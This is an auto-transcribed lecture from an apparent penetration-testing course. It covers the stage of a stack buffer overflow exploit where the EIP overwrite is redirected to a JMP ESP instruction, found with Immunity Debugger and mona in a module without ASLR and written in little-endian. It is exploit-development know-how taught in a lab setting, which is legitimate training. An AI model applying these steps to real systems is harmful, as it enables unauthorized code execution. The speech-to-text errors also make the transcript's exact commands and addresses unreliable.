Time
14 hours 43 minutes
Difficulty
Advanced
CEU/CPE
15

Video Transcription

00:00
Hello, everybody. And welcome to the episode number 32 off the buffer overflow Siri's redirecting execution.
00:08
My name is Alejandro Gonna and I'll be instructor for today's session.
00:12
The learning operatives of the session is to understand the concepts behind the buffer overflow attack and apply the techniques to implementable for overflow attack.
00:21
So let's get down to business, shall we?
00:25
First again, Let me remind you what the morning that pied iss and is just a plugin of the immunity vulgar so it can help us find out more about the memory where we're executing our you know, our payload or exploit
00:41
in this case, in this scenario, it will help us. You know, um,
00:46
find out what modules are loaded when we crash applications. We can actually, you know, jump to, uh, to that other module. Oh, our address. So let me just
00:57
show you how to do that. First, let me grab this out. And remember that in this case, we already have something crashed. So let me just crash it again
01:11
because we went to find out something that was being loaded at the crash time.
01:23
Okay, now that we have loaded that yes,
01:30
and Let me just
01:34
modify my my
01:37
my park is I don't want to send by characters anymore. I will not leave That commented, so we can know how we have bean processing in all of this.
01:48
So again,
01:51
z,
02:09
we crashed our application.
02:13
And now that I want to find out which modules are loaded in memory when duplication was crashed,
02:21
so just stop here at the bottom of the windows screen right here.
02:28
Montana modules.
02:30
And that's it. I think in certain. Entered that and I can see a lot of modules being loaded. All these three murder precise.
02:38
Now, the point right now is to remember a couple of things.
02:45
I remember that I told you that the range of the memory does not have to contain back character. We identify in the previous video, you remember, the bad character affecting the execution flow was the 00 character, which is, you know, the representation of the new Carter.
03:02
Uh, so that's one criteria. And the other criteria is to have some others that doesn't contain memory protection.
03:12
Uh, like, for example, a SLR out space layout Run. Devastation A Again A s L R. Uh, Yeah. You cannot
03:23
find these models sometimes, and you will have to implement techniques techniques to bypass such protections. But this is beyond this this discourse, because this will know
03:36
this is beyond scores. Well, creating a before overflow, but that their techniques that you can use to actually bypass day the other space layout, random ization protection or any other protection. So for this case, thes two actresses look good to me. For example, all of them have false false
03:54
ah, years allowed, for example, falls
03:58
and enforce again. So yeah, let's grab this one.
04:08
Okay. Um uh,
04:10
you kill you Could, you know,
04:12
at any other you know, memory. You could use any other member memory address, but let's let's just the 1st 1 which is just a dll which is, by the way, being loaded from the bulletin server application eso we need now to Now that we know what,
04:31
remember the name E s s funk
04:34
dot the l l remember that name. Uh, now that we know that name, we need to find a jumpy sp instructions so we can reach this module by jumpy s B. I mean, we already are in the bone server. That exit module or stock. I'm sorry.
04:53
And we are. We now know the location, so we need to tell that e a p
05:00
to jump to the top of the stack off these dll
05:04
and if that makes sense, but yeah, that's that's what we need to tell it. So we need to find a jumpy sp s instruction so we can tell it to go to the top of their E s s function. That deal
05:18
for that I go to the executed all modules list. Let me just
05:23
click in that
05:25
and you can see that there's, ah, this our function in there, uh, you know, and just double click on it. And I'm, you know, in that module, that module is loaded. That's the point. Uh,
05:38
here, you can see that on the top of the immunity, the vulgar. Now I need to again Fine. Um,
05:46
jumpy sp So I just go here, right? Click search for command, for example.
05:53
I put jump your speed which is already in there. Remember Jumpy s B y type find and he gave me this address. Now this is really important because I need Thio.
06:05
Put that a specific address in my e i p. You know, you cannot in any in their rare case that you don't find a jump. Yes, but you can still go search for the secrets of romance and just type
06:24
Let me just stopping here.
06:28
Push
06:29
Oh, yeah school
06:30
and then return
06:33
and fine.
06:35
And no, I did not found so that's OK. We're really found or jumpy as being that application. If you don't find anything in that, um,
06:47
in that module or, you know, in that region, you can always go to all modules. Am at the top.
06:55
Ah, here on and you can find the X function. And you can see that on Lee. One of them is marked as execute herbal, which is that Dr 60 Region. But you know,
07:10
you can try to use that actress. Remember that we selected the address without memory protection for the s s function process. We're free to use instruction for any level in section for this module. And not only the ones marked acts executed ble
07:27
s so you can tell Monets. Look for Jumpy s P instruction in their entire region,
07:32
bypassing dis command. Let me. Well, first, let's find out What's the hex of Cuba? Lint off a champion's be extraction so we can let me just check this out
07:48
and we can actually tell it. Thio, let me just find Locate. Not Awesome. Another
07:57
Ruby script
07:59
off the mat. Disciplined framework.
08:01
Let me just copy that
08:07
and just
08:09
run it and pass it. The instruction jumping, spin, instruction jump dsp
08:16
and we'll tell us an extension is f f e Ford. Okay, that's fine
08:20
ff before. So I go back to my Mona, um, to my bone immunity vulgar with Mona
08:28
Python script, and I tell it to go to find from Yes
08:33
Morna Fine Dash s
08:39
which is, by the way, for string and X
08:43
if f
08:45
ex before, which is basically fine. Ah, jumpy sp And I wanted to find in all the in all the modules or the module specific. E um
08:56
Remember the name of the module, which is
09:00
and Cee. Cee are What's what was the name of module?
09:09
Oh, yeah,
09:11
is
09:13
Phillips wasn't s s e
09:16
easy.
09:18
Ah, it's s o. Look at me as e s s functioned at the l.
09:24
So we typed out and we find total nine pointers
09:28
which is good. You know, my point is that there's good. In fact, if you take a look at the 1st 1 that came from that command, it's actually the one we're using or the one we selected at the beginning. 6 to 60 to 51 a one a f
09:48
right, That's different. We can actually use any of this as long as they don't contain any bad characters. Which is? It seems they don't. They don't contain 00 so and they all they all are jumpy space. Remember FF the Ford F before? No, they all are jumpy SP. So we're getting that in that matter.
10:07
Ah,
10:09
but let's stick with the 1st 1 Which was this? This one specifically the one that market right now s Oh, let's just double check. Let's just
10:20
execute this and you can see that's already in their 6 to 50 11 a. F just to see if it actually goes to a jumpy S B. And in fact, it goes to a jumpy SP. So we're good in that matter. I mean, just we're just awful checking. That
10:37
s so now that we know that this is the this actually contains a jumpy SB let me just
10:43
but that
10:43
in a CPU view,
10:46
let me just close it out Anyway. We have to
10:48
restored service. Not now that we know that, um,
10:52
what address we need to use when we can actually change. Um, sorry.
10:58
We can actually change are a proof of concept.
11:03
Um, so we can instead of those four beasts, because those were busy for work for over it. Over Right in.
11:11
We're over right in the eye piece. So we not need to put that. So remember that
11:18
we need to put it in reverse as the 32 bit architecture restores actresses in memory in the little Indian Forman. So yeah,
11:30
this x A f.
11:31
You know, the very end of the string. 11
11:37
50
11:41
and 62. And we have our address right now.
11:46
Now the execution will flow. Will not go to a non existent offers Like the four bees we were saying before. In this 42. 42 42 42 you will go to a really address with a jump. Is peace awaking execute or shell coat?
12:03
So basically, we're telling the stack of the program. Okay, You know what don't Don't continue. Ah,
12:09
with danger stack on executing whatever was to be executed next. Actually, go to this other location. Where way have ah ah Jump sp Um uh you know, we have the entire stuck for ourselves and we like to actually execute this payload.
12:28
Not what payload are we going to execute?
12:33
That's the one we're going to create next in our upcoming medias.
12:39
Let me just say this one out.
12:46
What is executed by the Mono Modules Command? Well, it will show us all the modules modules that are loaded in memory. When we crashed the application, these will help us to see if we have another model that we can jump to.
13:01
Oh, our other stocks. We can jump to you and, you know, find out.
13:05
Um Oh, see if we can actually use one of them to execute our payload.
13:11
What is executed by the Monas crypt? We passed that Dash s flack. It will search for specific string on a specific module. If way tell that s o we can in this in this media which we search for a chump is B string
13:28
in a specific module Was Wes the S s function.
13:33
Dll So yeah, that's what you can't cheat by passing that flag
13:37
in this video, we'll learn some concepts behind the buffer overflow attack, and we implemented sound techniques to execute the before offer flow Attack supplemental materials again the hurricane playbook again. Amazing book and you know it's still with the catch the flag 101 guys
13:56
In the next video, we'll see how to create a neck secure or Pedro's we can actually go from from, you know, controlling controlling the AP. Tell the a pity Jump to another SP, and from that DSP, which is the top of the stock execute or payload,
14:13
was That's it for today, folks, I hope in your DVD a and talk to you soon.

Up Next

Offensive Penetration Testing

This is a deep course about penetration testing. In this course, you’ll learn from basic to the most advanced and modern techniques to find vulnerabilities through information gathering, create and/or use exploits and be able to escalate privileges in order to test your information systems defenses.

Instructed By

Instructor Profile Image
Alejandro Guinea
CERT Regional Director
Instructor